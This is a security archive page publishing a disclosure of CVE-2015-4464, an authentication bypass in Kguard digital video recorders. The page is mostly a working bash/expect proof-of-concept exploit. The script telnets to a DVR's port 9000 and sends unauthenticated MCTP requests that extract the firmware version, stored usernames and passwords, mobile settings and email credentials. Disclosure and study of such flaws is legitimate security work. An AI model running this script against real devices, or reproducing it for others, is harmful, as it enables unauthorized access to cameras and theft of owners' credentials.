Twenty Year Anniversary

Kguard Digital Video Recorder Bypass Issues

Kguard Digital Video Recorder Bypass Issues
Posted Jun 24, 2015
Authored by Federick Joe P Fajardo

A deficiency in handling authentication and authorization has been found with Kguard 104/108/v2 models. While password-based authentication is used by the ActiveX component to protect the login page, all the communication to the application server at port 9000 allows data to be communicated directly with insufficient or improper authorization. Proof of concept exploit included.

tags | exploit, activex, proof of concept
advisories | CVE-2015-4464
MD5 | 193e1c13c376a9696db8861bf83eb8b8

Kguard Digital Video Recorder Bypass Issues

Change Mirror Download
CVEID: CVE-2015-4464

SUBJECT: Insufficient Authorization Checks Request Handling Remote
Authentication Bypass for Kguard Digital Video Recorders

DESCRIPTION: A deficiency in handling authentication and authorization
has been found with Kguard 104/108/v2 models. While password-based
authentication
is used by the ActiveX component to protect the login page, all the
communication
to the application server at port 9000 allows data to be communicated
directly
with insufficient or improper authorization.

CVSS Base Score: 9.7
CVSS Temporal Score: 8.3
CVSS Environmental Score: Undefined
CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:P/E:F/RL:U/RC:UR)

Affected Products and Versions

Kguard Digital Video Recorders: KG-SHA104/KG-SHA108/v2. Other variants
that runs
the same firmware from Zhuhai Raysharp Technology Co Ltd, are believed to
be vulnerable.

Exploit / Proof of Concept:

https://goo.gl/L5ASRo (or see below)

Remediation/Fixes

None.

Workarounds and Mitigations

See: [06]

References:

[01] http://www.securityfocus.com/archive/1/534830
[02]
http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527
[03] http://osvdb.org/show/osvdb/119402
[04] http://osvdb.org/show/osvdb/119422
[05] http://osvdb.org/show/osvdb/119403
[06]
https://www.academia.edu/11677554/Kguard_Digital_Video_Recorders_Multiple_Vulnerabilities



------ kguard-exploit-poc.txt -----

#!/bin/bash
# Title: Kguard Digital Video Recorders POC Exploit
# Author: Eric Fajardo - fjpfajardo@ph.ibm.com / 06/15/2015

# CVE-2015-4464 - This POC demonstrates the successful exploitation of
# security flaws which has been found with Kguard SHA104/108 models. These
# Digital Video Recorders suffers from a design flaw in the protocol
# implementation which makes the product insecure. Access to these devices
# are designed for Internet Explorer and uses ActiveX to bridge the
# communication from the browser to the DVR's application server.
# The communication layer between the ActiveX control and the application
# server has no authentication and authorization mechanism which may lead
# to the exposure of all credentials in the device and the ability to do
# unauthorized modification of the config including functions which can
# potentially make the device unoperable.

# A full disclosure can be read at:
# https://www.academia.edu/11677554/Multiple_Vulnerabilities_with_Kguard_Digital_Video_Recorders

HOSTID="$2"
PORTID="$3"
NARGS=2
BARGS=65

main(){
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
printf "USAGE: $0 {OPTION} {HOSTNAME} {PORT}\n";
printf "EXAMPLE: $0 --getver dvr.johndoe.com 9000\n\n";
printf "WHERE:\n";
printf "\033[1m--getver\033[0m\t- Get the firmware version.\n";
printf "\033[1m--getcred\033[0m\t- Get the DVR's usernames/passwords.\n";
printf "\033[1m--getmobile\033[0m\t- Get the DVR's mobile phone config.\n";
printf "\033[1m--getemail\033[0m\t- Get the email/password if configured.\n";
}

# 01 - EXECUTE GETVERSION
function execute_getver(){
echo "[X] - Running option getver...";
/usr/bin/expect<<EOD
set timeout 20
spawn telnet $HOSTID $PORTID
expect "Escape character is"
send "REMOTE HI_SRDK_MEDIA_GetShowAttr MCTP/1.0\n"
send "CSeq:1\n"
send "Accept:text/HDP\n"
send "Content-Type:text/HDP\n"
send "Func-Version:0x10\n"
send "Content-Length:15\n\n"
send "Segment-Num:0\n"
expect "MCTP/1.0 200 OK"
sleep 3
send "^]\r"
expect "telnet>"
send "quit\r"
exit 1
EOD
}

# 02 - EXECUTE GETCRED
function execute_getcred(){
echo "[X] - Running option getcred...";
/usr/bin/expect<<EOD
set timeout 20
spawn telnet $HOSTID $PORTID
expect "Escape character is"
send "REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0\n"
send "CSeq:2\n"
send "Accept:text/HDP\n"
send "Content-Type:text/HDP\n"
send "Func-Version:0x10\n"
send "Content-Length:51\n\n"
send "Segment-Num:1\n"
send "Segment-Seq:1\n"
send "Data-Length:4\n\n\n\n"
send "...\n"
expect "MCTP/1.0 200 OK"
sleep 3
send "^]\r"
expect "telnet>"
send "quit\r"
exit 1
EOD
}

# 03 - EXECUTE GETMOBILE
function execute_getmobile(){
echo "[X] - Running option getmobile...";
/usr/bin/expect<<EOD
set timeout 20
spawn telnet $HOSTID $PORTID
expect "Escape character is"
send "REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0\n"
send "CSeq:1\n"
send "Accept:text/HDP\n"
send "Content-Type:text/HDP\n"
send "Func-Version:0x10\n"
send "Content-Length:15\n\n"
send "Segment-Num:0\n"
expect "MCTP/1.0 200 OK"
sleep 3
send "^]\r"
expect "telnet>"
send "quit\r"
exit 1
EOD
}

# 04 - EXECUTE GETEMAIL
function execute_getemail(){
echo "[X] - Running option getemail...";
/usr/bin/expect<<EOD
set timeout 20
spawn telnet $HOSTID $PORTID
expect "Escape character is"
send "REMOTE HI_SRDK_NET_GetEmailAttr MCTP/1.0\n"
send "CSeq:1\n"
send "Accept:text/HDP\n"
send "Content-Type:text/HDP\n"
send "Func-Version:0x10\n"
send "Content-Length:15\n\n"
send "Segment-Num:0\n"
expect "MCTP/1.0 200 OK"
sleep 3
send "^]\r"
expect "telnet>"
send "quit\r"
exit 1
EOD
}

[[ $# -lt $NARGS ]] && main && exit $BARGS
case $1 in

--getver )
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
execute_getver
exit 0
;;

--getcred )
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
execute_getcred
exit 0
;;

--getmobile )
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
execute_getmobile
exit 0
;;

--getemail )
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
execute_getemail
exit 0
;;


*)
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";

esac
exit 0


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

April 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    5 Files
  • 2
    Apr 2nd
    17 Files
  • 3
    Apr 3rd
    11 Files
  • 4
    Apr 4th
    21 Files
  • 5
    Apr 5th
    17 Files
  • 6
    Apr 6th
    12 Files
  • 7
    Apr 7th
    1 Files
  • 8
    Apr 8th
    6 Files
  • 9
    Apr 9th
    21 Files
  • 10
    Apr 10th
    18 Files
  • 11
    Apr 11th
    42 Files
  • 12
    Apr 12th
    7 Files
  • 13
    Apr 13th
    14 Files
  • 14
    Apr 14th
    1 Files
  • 15
    Apr 15th
    1 Files
  • 16
    Apr 16th
    15 Files
  • 17
    Apr 17th
    20 Files
  • 18
    Apr 18th
    24 Files
  • 19
    Apr 19th
    20 Files
  • 20
    Apr 20th
    7 Files
  • 21
    Apr 21st
    10 Files
  • 22
    Apr 22nd
    2 Files
  • 23
    Apr 23rd
    17 Files
  • 24
    Apr 24th
    35 Files
  • 25
    Apr 25th
    14 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close